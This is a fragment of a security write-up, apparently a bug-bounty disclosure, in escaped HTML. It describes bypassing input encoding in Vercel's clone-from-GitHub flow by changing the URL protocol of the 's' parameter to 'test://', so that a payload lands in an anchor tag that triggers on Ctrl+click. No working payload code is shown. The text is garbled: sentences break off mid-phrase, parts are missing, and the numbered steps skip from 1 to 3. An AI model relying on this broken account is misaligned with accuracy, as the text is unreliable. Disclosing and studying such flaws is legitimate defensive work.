This write-up explains how I identified the issue, the payloads used, and how it was resolved.<\/p>\n\n\n\n<p>When creating a new project on Vercel by cloning from GitHub, the platform generates the <code>&gt;<\/code>, <code>\"<\/code>) in the <code>s<\/code> parameter, but they were properly encoded. However, by manipulating the <strong>protocol<\/strong> of the URL, I found a bypass.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploitation Steps<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">1. Protocol Manipulation<\/h4>\n\n\n\n<p>Changing the protocol in the <code>s<\/code> parameter to <code>test:\/\/<\/code> bypass validation. payload<\/strong> in the anchor tag.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">3. Executing the Payload<\/h4>\n\n\n\n<p>Due to the <code>target=\"_blank\"<\/code> attribute, the malicious payload required a <strong>CTRL + Left Click<\/strong> (or equivalent) to trigger in modern browsers.
